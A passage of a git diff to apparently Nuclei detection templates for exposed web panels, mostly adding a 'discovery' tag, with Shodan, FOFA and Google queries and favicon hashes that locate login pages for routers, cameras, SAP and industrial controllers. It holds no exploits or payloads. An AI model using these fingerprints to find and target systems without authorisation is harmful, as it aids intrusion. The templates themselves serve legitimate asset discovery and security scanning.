a/http/exposed-panels/redhat/redhat-satellite-panel.yaml +++ b/http/exposed-panels/redhat/redhat-satellite-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.html:"redhat" "Satellite" product: satellite vendor: redhat - tags: panel,redhat,satellite + tags: panel,redhat,satellite,discovery http: - method: GET diff --git a/http/exposed-panels/redis-commander-exposure.yaml b/http/exposed-panels/redis-commander-exposure.yaml index 9414ba42142..b40519676c2 100644 --- a/http/exposed-panels/redis-commander-exposure.yaml +++ b/http/exposed-panels/redis-commander-exposure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,redis + tags: panel,redis,discovery http: - method: GET diff --git a/http/exposed-panels/redis-enterprise-panel.yaml b/http/exposed-panels/redis-enterprise-panel.yaml index 697b5d00cc7..264d5baa002 100644 --- a/http/exposed-panels/redis-enterprise-panel.yaml +++ b/http/exposed-panels/redis-enterprise-panel.yaml @@ -12,7 +12,7 @@ info: vendor: redis product: redis_enterprise shodan-query: title:"Enterprise-Class Redis for Developers" - tags: panel,redis,enterprise + tags: panel,redis,enterprise,discovery http: - method: GET diff --git a/http/exposed-panels/redmine-panel.yaml b/http/exposed-panels/redmine-panel.yaml index 70c0f0e4aef..cf796364548 100644 --- a/http/exposed-panels/redmine-panel.yaml +++ b/http/exposed-panels/redmine-panel.yaml @@ -15,7 +15,7 @@ info: vendor: redmine product: redmine shodan-query: http.html:'content="Redmine' - tags: panel,redmine,login,detect + tags: panel,redmine,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/regify-panel.yaml b/http/exposed-panels/regify-panel.yaml index abd80442167..3395a97f735 100644 --- a/http/exposed-panels/regify-panel.yaml +++ b/http/exposed-panels/regify-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1817615343 - tags: panel,regify,login,detect + tags: panel,regify,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/remedy-axis-login.yaml b/http/exposed-panels/remedy-axis-login.yaml index c9e2c90956f..a612d6a426d 100644 --- a/http/exposed-panels/remedy-axis-login.yaml +++ b/http/exposed-panels/remedy-axis-login.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.html:"BMC Remedy" product: remedy_action_request_system vendor: bmc - tags: panel,remedy,bmc + tags: panel,remedy,bmc,discovery http: - method: GET diff --git a/http/exposed-panels/remkon-manager-panel.yaml b/http/exposed-panels/remkon-manager-panel.yaml index db8011b6bfe..ca00e64fbdb 100644 --- a/http/exposed-panels/remkon-manager-panel.yaml +++ b/http/exposed-panels/remkon-manager-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Remkon Device Manager" product: remkon_device_manager vendor: nascent - tags: panel,remkon,login + tags: panel,remkon,login,discovery http: - method: GET diff --git a/http/exposed-panels/remote-ui-login.yaml b/http/exposed-panels/remote-ui-login.yaml index 18224e43457..bc86cb67c01 100644 --- a/http/exposed-panels/remote-ui-login.yaml +++ b/http/exposed-panels/remote-ui-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/reolink-panel.yaml b/http/exposed-panels/reolink-panel.yaml index 95e63ee726f..95c6112a09b 100644 --- a/http/exposed-panels/reolink-panel.yaml +++ b/http/exposed-panels/reolink-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 fofa-query: "Reolink" shodan-query: title:"Reolink" - tags: panel,login,reolink,detect + tags: panel,login,reolink,detect,discovery http: - method: GET diff --git a/http/exposed-panels/repetier-server-panel.yaml b/http/exposed-panels/repetier-server-panel.yaml index 4e1175fa747..3b36c8db60a 100644 --- a/http/exposed-panels/repetier-server-panel.yaml +++ b/http/exposed-panels/repetier-server-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"repetier-server" fofa-query: title="repetier-server" google-query: intitle:"repetier-server" - tags: panel,repetier,detect,repetier-server + tags: panel,repetier,detect,repetier-server,discovery http: - method: GET diff --git a/http/exposed-panels/reportico-admin-panel.yaml b/http/exposed-panels/reportico-admin-panel.yaml index 5aa7eb5bef8..2e2b7118a2f 100644 --- a/http/exposed-panels/reportico-admin-panel.yaml +++ b/http/exposed-panels/reportico-admin-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"reportico administration page" fofa-query: title="reportico administration page" google-query: intitle:"reportico administration page" - tags: panel,reportico,login,detect + tags: panel,reportico,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/reposilite-panel.yaml b/http/exposed-panels/reposilite-panel.yaml index f3e3e4c6523..fb8b1a268e0 100644 --- a/http/exposed-panels/reposilite-panel.yaml +++ b/http/exposed-panels/reposilite-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"reposilite" - tags: panel,reposilite,login + tags: panel,reposilite,login,discovery http: - method: GET diff --git a/http/exposed-panels/request-tracker-panel.yaml b/http/exposed-panels/request-tracker-panel.yaml index 031b6f05107..e6c8aa5bd9a 100644 --- a/http/exposed-panels/request-tracker-panel.yaml +++ b/http/exposed-panels/request-tracker-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:203612613 - tags: panel,login,request,tracker + tags: panel,login,request,tracker,discovery http: - method: GET diff --git a/http/exposed-panels/residential-gateway-login.yaml b/http/exposed-panels/residential-gateway-login.yaml index cd59cb1f057..2da2eea1b05 100644 --- a/http/exposed-panels/residential-gateway-login.yaml +++ b/http/exposed-panels/residential-gateway-login.yaml @@ -12,7 +12,7 @@ info: max-request: 2 shodan-query: http.title:"Login - Residential Gateway" google-query: intitle:"Login - Residential Gateway" - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/retool-login.yaml b/http/exposed-panels/retool-login.yaml index d9893cda351..9c736ffc76d 100644 --- a/http/exposed-panels/retool-login.yaml +++ b/http/exposed-panels/retool-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Retool" product: retool vendor: retool - tags: login,panel,retool + tags: login,panel,retool,discovery http: - method: GET diff --git a/http/exposed-panels/ricoh-webimagemonitor-panel.yaml b/http/exposed-panels/ricoh-webimagemonitor-panel.yaml index d3cbe9add9e..744fdbeebb7 100644 --- a/http/exposed-panels/ricoh-webimagemonitor-panel.yaml +++ b/http/exposed-panels/ricoh-webimagemonitor-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Web Image Monitor" - tags: panel,ricoh,detect + tags: panel,ricoh,detect,discovery http: - method: GET diff --git a/http/exposed-panels/riello-netman204-panel.yaml b/http/exposed-panels/riello-netman204-panel.yaml index 76ef2c39ec9..16d87de3815 100644 --- a/http/exposed-panels/riello-netman204-panel.yaml +++ b/http/exposed-panels/riello-netman204-panel.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="netman 204" censys-query: services.http.response.body:"netman204" google-query: intitle:"netman 204" - tags: netman,panel,detect,login + tags: netman,panel,detect,login,discovery http: - method: GET diff --git a/http/exposed-panels/riseup-panel.yaml b/http/exposed-panels/riseup-panel.yaml index e1825cf2256..5334614079b 100644 --- a/http/exposed-panels/riseup-panel.yaml +++ b/http/exposed-panels/riseup-panel.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,riseup + tags: panel,riseup,discovery http: - method: GET diff --git a/http/exposed-panels/rocketchat-panel.yaml b/http/exposed-panels/rocketchat-panel.yaml index 57c10ed2828..9ac04a70b63 100644 --- a/http/exposed-panels/rocketchat-panel.yaml +++ b/http/exposed-panels/rocketchat-panel.yaml @@ -15,7 +15,7 @@ info: vendor: rocket.chat product: rocket.chat shodan-query: http.title:"Rocket.Chat" - tags: panel,rocketchat,login,detect + tags: panel,rocketchat,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/rocketmq-console-exposure.yaml b/http/exposed-panels/rocketmq-console-exposure.yaml index 713d1c4158c..c4d7a6dda19 100644 --- a/http/exposed-panels/rocketmq-console-exposure.yaml +++ b/http/exposed-panels/rocketmq-console-exposure.yaml @@ -25,7 +25,7 @@ info: google-query: - intitle:"rocketmq" - intitle:"rocketmq-console-ng" - tags: panel,apache + tags: panel,apache,discovery http: - method: GET diff --git a/http/exposed-panels/room-alert-detect.yaml b/http/exposed-panels/room-alert-detect.yaml index 59f39564e93..54480cea5c9 100644 --- a/http/exposed-panels/room-alert-detect.yaml +++ b/http/exposed-panels/room-alert-detect.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Room Alert" product: room_alert_3e vendor: avtech - tags: panel,room-alert,avtech + tags: panel,room-alert,avtech,discovery http: - method: GET diff --git a/http/exposed-panels/roxy-fileman.yaml b/http/exposed-panels/roxy-fileman.yaml index e2f870cf36c..d4f5913426c 100644 --- a/http/exposed-panels/roxy-fileman.yaml +++ b/http/exposed-panels/roxy-fileman.yaml @@ -19,7 +19,7 @@ info: - intitle:"roxy file manager" shodan-query: http.title:"roxy file manager" fofa-query: title="roxy file manager" - tags: tech,roxy,fileman,panel,roxyfileman + tags: tech,roxy,fileman,panel,roxyfileman,discovery http: - method: GET diff --git a/http/exposed-panels/royalevent-management-panel.yaml b/http/exposed-panels/royalevent-management-panel.yaml index c7f9698e354..779f43c2bb3 100644 --- a/http/exposed-panels/royalevent-management-panel.yaml +++ b/http/exposed-panels/royalevent-management-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: royalevent,panel + tags: royalevent,panel,discovery http: - method: GET diff --git a/http/exposed-panels/rsa-self-service.yaml b/http/exposed-panels/rsa-self-service.yaml index 3056d9d8a65..2cb925d5c32 100644 --- a/http/exposed-panels/rsa-self-service.yaml +++ b/http/exposed-panels/rsa-self-service.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,rsa + tags: panel,rsa,discovery http: - method: GET diff --git a/http/exposed-panels/rstudio-detect.yaml b/http/exposed-panels/rstudio-detect.yaml index c9dab29d310..f3ab20de2d3 100644 --- a/http/exposed-panels/rstudio-detect.yaml +++ b/http/exposed-panels/rstudio-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,rstudio + tags: panel,rstudio,discovery http: - method: GET diff --git a/http/exposed-panels/rstudio-panel.yaml b/http/exposed-panels/rstudio-panel.yaml index cbeb227ac93..cc6fe0153e4 100644 --- a/http/exposed-panels/rstudio-panel.yaml +++ b/http/exposed-panels/rstudio-panel.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: title:"RStudio Sign In" - tags: rstudio,login,panel + tags: rstudio,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/rtm-web-panel.yaml b/http/exposed-panels/rtm-web-panel.yaml index 75188b04022..bb3844dd338 100644 --- a/http/exposed-panels/rtm-web-panel.yaml +++ b/http/exposed-panels/rtm-web-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: "RTM WEB" - tags: panel,login,rtm-web + tags: panel,login,rtm-web,discovery http: - method: GET diff --git a/http/exposed-panels/ruckus-unleashed-panel.yaml b/http/exposed-panels/ruckus-unleashed-panel.yaml index f8cbf42141d..bf2d264a9ca 100644 --- a/http/exposed-panels/ruckus-unleashed-panel.yaml +++ b/http/exposed-panels/ruckus-unleashed-panel.yaml @@ -22,7 +22,7 @@ info: - intitle:"Unleashed Login" - intitle:"unleashed login" fofa-query: title="unleashed login" - tags: panel,ruckus,ruckuswireless + tags: panel,ruckus,ruckuswireless,discovery http: - method: GET diff --git a/http/exposed-panels/ruckus-wireless-admin-login.yaml b/http/exposed-panels/ruckus-wireless-admin-login.yaml index 316ce201cfc..daae72fdd5e 100644 --- a/http/exposed-panels/ruckus-wireless-admin-login.yaml +++ b/http/exposed-panels/ruckus-wireless-admin-login.yaml @@ -19,7 +19,7 @@ info: - http.title:"ruckus" fofa-query: title="ruckus" google-query: intitle:"ruckus" - tags: panel,exposed,ruckus,ruckuswireless + tags: panel,exposed,ruckus,ruckuswireless,discovery http: - method: GET diff --git a/http/exposed-panels/ruijie/rg-uac-panel.yaml b/http/exposed-panels/ruijie/rg-uac-panel.yaml index 9fb00399f8d..056d4a3ed7d 100644 --- a/http/exposed-panels/ruijie/rg-uac-panel.yaml +++ b/http/exposed-panels/ruijie/rg-uac-panel.yaml @@ -17,7 +17,7 @@ info: - http.html:"Get_Verify_Info" - http.html:"get_verify_info" fofa-query: body="get_verify_info" - tags: panel,ruijie,router,firewall + tags: panel,ruijie,router,firewall,discovery http: - method: GET diff --git a/http/exposed-panels/rundeck-login.yaml b/http/exposed-panels/rundeck-login.yaml index e4068aef267..96f1f7e4b6b 100644 --- a/http/exposed-panels/rundeck-login.yaml +++ b/http/exposed-panels/rundeck-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Rundeck" product: rundeck vendor: pagerduty - tags: panel,rundeck + tags: panel,rundeck,discovery http: - method: GET diff --git a/http/exposed-panels/rustici-content-controller.yaml b/http/exposed-panels/rustici-content-controller.yaml index bfc2d7948fb..1f74b566f7a 100644 --- a/http/exposed-panels/rustici-content-controller.yaml +++ b/http/exposed-panels/rustici-content-controller.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Rustici Content Controller" - tags: panel,rustici + tags: panel,rustici,discovery http: - method: GET diff --git a/http/exposed-panels/safenet-authentication-panel.yaml b/http/exposed-panels/safenet-authentication-panel.yaml index 305a12eb1d9..f596b0838f9 100644 --- a/http/exposed-panels/safenet-authentication-panel.yaml +++ b/http/exposed-panels/safenet-authentication-panel.yaml @@ -1,5 +1,5 @@ -id: safenet-authentication-panel - +id: safenet-authentication-panel + info: name: SafeNet Authentication Login Panel - Detect author: righettod @@ -12,24 +12,24 @@ info: verified: true max-request: 1 shodan-query: http.title:"Self Enrollment" - tags: panel,safenet,thales,login,detect + tags: panel,safenet,thales,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/selfenrollment/Enrollment.aspx" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "self enrollment") && contains_any(to_lower(body), "safenet", "thales")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}/selfenrollment/Enrollment.aspx" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "self enrollment") && contains_any(to_lower(body), "safenet", "thales")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'V=([0-9.]+)' # digest: 4b0a004830460221009a56d25c4fa3b2d6727690b061768b62e6d0578fa61ca998a83b522bf42e060e022100b9e454c802bbf820081ae91a56640cdadb46eb94a1998e2ae0f2d7c36eca106c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/saferoads-vms-login.yaml b/http/exposed-panels/saferoads-vms-login.yaml index f43f1dae116..31bcc4a509d 100644 --- a/http/exposed-panels/saferoads-vms-login.yaml +++ b/http/exposed-panels/saferoads-vms-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/sage-panel.yaml b/http/exposed-panels/sage-panel.yaml index 38bada3ce62..01259a90cad 100644 --- a/http/exposed-panels/sage-panel.yaml +++ b/http/exposed-panels/sage-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"sage x3" fofa-query: title="sage x3" google-query: intitle:"sage x3" - tags: panel,sage,login + tags: panel,sage,login,discovery http: - method: GET diff --git a/http/exposed-panels/saia-pcd-panel.yaml b/http/exposed-panels/saia-pcd-panel.yaml index d25d0491df5..3f6c58986ef 100644 --- a/http/exposed-panels/saia-pcd-panel.yaml +++ b/http/exposed-panels/saia-pcd-panel.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 1 shodan-query: html:"Saia PCD Web Server" - tags: saia,login,panel,pcd + tags: saia,login,panel,pcd,discovery http: - method: GET diff --git a/http/exposed-panels/saltbo-zpan-panel.yaml b/http/exposed-panels/saltbo-zpan-panel.yaml index 074d77a9319..6f56e926ea8 100644 --- a/http/exposed-panels/saltbo-zpan-panel.yaml +++ b/http/exposed-panels/saltbo-zpan-panel.yaml @@ -17,7 +17,7 @@ info: product: zpan fofa-query: title="zpan" shodan-query: title:"zpan" - tags: panel,zpan,login,detect + tags: panel,zpan,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/saltgui-panel.yaml b/http/exposed-panels/saltgui-panel.yaml index 0ecef692c74..f9ac230f511 100644 --- a/http/exposed-panels/saltgui-panel.yaml +++ b/http/exposed-panels/saltgui-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,saltgui + tags: panel,saltgui,discovery http: - method: GET diff --git a/http/exposed-panels/saltstack-config-panel.yaml b/http/exposed-panels/saltstack-config-panel.yaml index 1aee3c52512..576add89f42 100644 --- a/http/exposed-panels/saltstack-config-panel.yaml +++ b/http/exposed-panels/saltstack-config-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"SaltStack Config" product: saltstack vendor: saltstack - tags: panel,vmware,login,saltstack + tags: panel,vmware,login,saltstack,discovery http: - method: GET diff --git a/http/exposed-panels/samba-swat-panel.yaml b/http/exposed-panels/samba-swat-panel.yaml index 2a0e776d60c..778ecee7b88 100644 --- a/http/exposed-panels/samba-swat-panel.yaml +++ b/http/exposed-panels/samba-swat-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: samba product: samba - tags: panel,samba + tags: panel,samba,discovery http: - method: GET diff --git a/http/exposed-panels/samsung-printer-detect.yaml b/http/exposed-panels/samsung-printer-detect.yaml index b564dfc1b2f..5c849aa4491 100644 --- a/http/exposed-panels/samsung-printer-detect.yaml +++ b/http/exposed-panels/samsung-printer-detect.yaml @@ -16,7 +16,7 @@ info: fofa-query: - app="SAMSUNG-Printer" - app="samsung-printer" - tags: iot,panel,samsung,printer + tags: iot,panel,samsung,printer,discovery http: - method: GET diff --git a/http/exposed-panels/sap-cloud-analytics.yaml b/http/exposed-panels/sap-cloud-analytics.yaml index 2d6d9f75479..f8dc05b1e2e 100644 --- a/http/exposed-panels/sap-cloud-analytics.yaml +++ b/http/exposed-panels/sap-cloud-analytics.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"SAP Analytics Cloud" - tags: panel,sap,cloudanalytics + tags: panel,sap,cloudanalytics,discovery http: - method: GET diff --git a/http/exposed-panels/sap-hana-xsengine-panel.yaml b/http/exposed-panels/sap-hana-xsengine-panel.yaml index 2c22315935a..48e181eef6e 100644 --- a/http/exposed-panels/sap-hana-xsengine-panel.yaml +++ b/http/exposed-panels/sap-hana-xsengine-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,sap + tags: panel,sap,discovery http: - method: GET diff --git a/http/exposed-panels/sap-netweaver-cet-detect.yaml b/http/exposed-panels/sap-netweaver-cet-detect.yaml index f801c0512c2..31172fa6665 100644 --- a/http/exposed-panels/sap-netweaver-cet-detect.yaml +++ b/http/exposed-panels/sap-netweaver-cet-detect.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 - tags: sap,netweaver,cet,detect + tags: sap,netweaver,cet,detect,discovery http: - method: GET diff --git a/http/exposed-panels/sap-netweaver-portal.yaml b/http/exposed-panels/sap-netweaver-portal.yaml index 9e5a7fcbc51..a0e0205a351 100644 --- a/http/exposed-panels/sap-netweaver-portal.yaml +++ b/http/exposed-panels/sap-netweaver-portal.yaml @@ -16,7 +16,7 @@ info: max-request: 1 vendor: sap product: netweaver_portal - tags: panel,sap + tags: panel,sap,discovery http: - method: GET diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml index 77673bd9371..fc96142e074 100644 --- a/http/exposed-panels/sap-successfactors-detect.yaml +++ b/http/exposed-panels/sap-successfactors-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"login - sap successfactors" fofa-query: title="login - sap successfactors" google-query: intitle:"login - sap successfactors" - tags: panel,sap,detect + tags: panel,sap,detect,discovery http: - method: GET diff --git a/http/exposed-panels/sapfiori-panel.yaml b/http/exposed-panels/sapfiori-panel.yaml index b8ab7f2c9be..56e18b85f0e 100644 --- a/http/exposed-panels/sapfiori-panel.yaml +++ b/http/exposed-panels/sapfiori-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: sap product: fiori - tags: panel,sap,fiori + tags: panel,sap,fiori,discovery http: - method: GET diff --git a/http/exposed-panels/sas-login-panel.yaml b/http/exposed-panels/sas-login-panel.yaml index 459095e0f36..d65cc5c1c8b 100644 --- a/http/exposed-panels/sas-login-panel.yaml +++ b/http/exposed-panels/sas-login-panel.yaml @@ -16,7 +16,7 @@ info: product: base_sas shodan-query: http.favicon.hash:957255151 fofa-query: icon_hash=957255151 - tags: sas,panel + tags: sas,panel,discovery http: - method: GET diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml index e5f480f9da6..28e555968ce 100644 --- a/http/exposed-panels/satis-repository.yaml +++ b/http/exposed-panels/satis-repository.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: html:"<a href=\"https://github.com/composer/satis\">Satis</a>" - tags: panel,exposure,composer,satis + tags: panel,exposure,composer,satis,discovery http: - method: GET diff --git a/http/exposed-panels/sauter-login.yaml b/http/exposed-panels/sauter-login.yaml index 2032f507f10..5b4e9a7a3af 100644 --- a/http/exposed-panels/sauter-login.yaml +++ b/http/exposed-panels/sauter-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,sauter,edb + tags: panel,sauter,edb,discovery http: - method: GET diff --git a/http/exposed-panels/sauter-moduwebvision-panel.yaml b/http/exposed-panels/sauter-moduwebvision-panel.yaml index 462ead09e61..8a50d39f133 100644 --- a/http/exposed-panels/sauter-moduwebvision-panel.yaml +++ b/http/exposed-panels/sauter-moduwebvision-panel.yaml @@ -17,7 +17,7 @@ info: product: moduweb_vision shodan-query: http.favicon.hash:-1663319756 fofa-query: icon_hash=-1663319756 - tags: panel,moduweb,sauter,login + tags: panel,moduweb,sauter,login,discovery http: - method: GET diff --git a/http/exposed-panels/scalar-detection.yaml b/http/exposed-panels/scalar-detection.yaml index 20c588c8db8..86c3b5a677f 100644 --- a/http/exposed-panels/scalar-detection.yaml +++ b/http/exposed-panels/scalar-detection.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Scalar API Reference" fofa-query: title="Scalar API Reference" google-query: intitle:"Scalar API Reference" - tags: panel,scalar,api,documentation,detect + tags: panel,scalar,api,documentation,detect,discovery http: - method: GET diff --git a/http/exposed-panels/scan2net-panel.yaml b/http/exposed-panels/scan2net-panel.yaml index c2e008208be..6cd43c6704e 100644 --- a/http/exposed-panels/scan2net-panel.yaml +++ b/http/exposed-panels/scan2net-panel.yaml @@ -12,7 +12,7 @@ info: shodan-query: - http.favicon.hash:1780061475 - http.title:"Scan2Net" - tags: panel,scan2net,login + tags: panel,scan2net,login,discovery http: - method: GET diff --git a/http/exposed-panels/scribble-diffusion-panel.yaml b/http/exposed-panels/scribble-diffusion-panel.yaml index 420dc9f49a7..05eabde01ef 100644 --- a/http/exposed-panels/scribble-diffusion-panel.yaml +++ b/http/exposed-panels/scribble-diffusion-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Scribble Diffusion" - tags: panel,scribble,detect + tags: panel,scribble,detect,discovery http: - method: GET diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml index d56d4b503c0..27ee09e3d18 100644 --- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml @@ -15,7 +15,7 @@ info: vendor: scriptcase product: scriptcase shodan-query: title:"ScriptCase" - tags: panel,scriptcase + tags: panel,scriptcase,discovery http: - method: GET diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml index 36363ea0aba..a90625d25ec 100644 --- a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml @@ -15,7 +15,7 @@ info: vendor: scriptcase product: scriptcase shodan-query: title:"ScriptCase" - tags: panel,scriptcase + tags: panel,scriptcase,discovery http: - method: GET diff --git a/http/exposed-panels/scs-landfill-control.yaml b/http/exposed-panels/scs-landfill-control.yaml index 23ebea90fa2..9b1972c0b48 100644 --- a/http/exposed-panels/scs-landfill-control.yaml +++ b/http/exposed-panels/scs-landfill-control.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,scs,rmc,iot + tags: panel,scs,rmc,iot,discovery http: - method: GET diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index 6a5fdd28d96..3ed5baf2774 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -19,7 +19,7 @@ info: product: seafile shodan-query: http.favicon.hash:1552322396 fofa-query: icon_hash=1552322396 - tags: sefile,panel,login,seafile + tags: sefile,panel,login,seafile,discovery http: - method: GET diff --git a/http/exposed-panels/seagate-nas-login.yaml b/http/exposed-panels/seagate-nas-login.yaml index 9df5d05db60..e5617afabde 100644 --- a/http/exposed-panels/seagate-nas-login.yaml +++ b/http/exposed-panels/seagate-nas-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"seagate nas - seagate" fofa-query: title="seagate nas - seagate" google-query: intitle:"seagate nas - seagate" - tags: panel,seagate,login + tags: panel,seagate,login,discovery http: - method: GET diff --git a/http/exposed-panels/seats-login.yaml b/http/exposed-panels/seats-login.yaml index c1ccd58ed9a..175dc4477da 100644 --- a/http/exposed-panels/seats-login.yaml +++ b/http/exposed-panels/seats-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/secmail-detect.yaml b/http/exposed-panels/secmail-detect.yaml index cd1f7b6786a..0aeea16ada1 100644 --- a/http/exposed-panels/secmail-detect.yaml +++ b/http/exposed-panels/secmail-detect.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: secmail - tags: secmail,panel + tags: secmail,panel,discovery http: - method: GET diff --git a/http/exposed-panels/secnet-ac-panel.yaml b/http/exposed-panels/secnet-ac-panel.yaml index f31ad43ab77..0c59eb1a1db 100644 --- a/http/exposed-panels/secnet-ac-panel.yaml +++ b/http/exposed-panels/secnet-ac-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: secnet-ac,panel + tags: secnet-ac,panel,discovery http: - method: GET diff --git a/http/exposed-panels/secure-login-panel.yaml b/http/exposed-panels/secure-login-panel.yaml index f6235cb3f3f..8ff3fce43ad 100644 --- a/http/exposed-panels/secure-login-panel.yaml +++ b/http/exposed-panels/secure-login-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Secure Login Service" - tags: panel,sls,login,service + tags: panel,sls,login,service,discovery http: - method: GET diff --git a/http/exposed-panels/securenvoy-panel.yaml b/http/exposed-panels/securenvoy-panel.yaml index 9ef9b60ca5e..f821ba5157f 100644 --- a/http/exposed-panels/securenvoy-panel.yaml +++ b/http/exposed-panels/securenvoy-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 4 shodan-query: http.title:"securenvoy" - tags: panel,securenvoy + tags: panel,securenvoy,discovery http: - method: GET diff --git a/http/exposed-panels/securepoint-utm.yaml b/http/exposed-panels/securepoint-utm.yaml index c30b7172ff7..39d46dc1bf5 100644 --- a/http/exposed-panels/securepoint-utm.yaml +++ b/http/exposed-panels/securepoint-utm.yaml @@ -14,7 +14,7 @@ info: fofa-query: app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8" product: unified_threat_management vendor: securepoint - tags: securepoint,panel + tags: securepoint,panel,discovery http: - method: GET diff --git a/http/exposed-panels/security-onion-panel.yaml b/http/exposed-panels/security-onion-panel.yaml index 8845a756ef9..f5b9efa4845 100644 --- a/http/exposed-panels/security-onion-panel.yaml +++ b/http/exposed-panels/security-onion-panel.yaml @@ -21,7 +21,7 @@ info: - http.title:"security onion" fofa-query: title="security onion" google-query: intitle:"security onion" - tags: panel,security,onion,detect,securityonionsolutions + tags: panel,security,onion,detect,securityonionsolutions,discovery http: - method: GET diff --git a/http/exposed-panels/securityspy-detect.yaml b/http/exposed-panels/securityspy-detect.yaml index 3b9c9668284..1daab0911db 100644 --- a/http/exposed-panels/securityspy-detect.yaml +++ b/http/exposed-panels/securityspy-detect.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: title:SecuritySpy - tags: unauth,iot,securityspy,panel,camera + tags: unauth,iot,securityspy,panel,camera,discovery http: - method: GET diff --git a/http/exposed-panels/seeddms-panel.yaml b/http/exposed-panels/seeddms-panel.yaml index 007d074be82..5c01ea6550b 100644 --- a/http/exposed-panels/seeddms-panel.yaml +++ b/http/exposed-panels/seeddms-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"seeddms" fofa-query: title="seeddms" google-query: intitle:"seeddms" - tags: panel,seeddms,login + tags: panel,seeddms,login,discovery http: - method: GET diff --git a/http/exposed-panels/selenium-grid.yaml b/http/exposed-panels/selenium-grid.yaml index cc6b1111737..8e949df499e 100644 --- 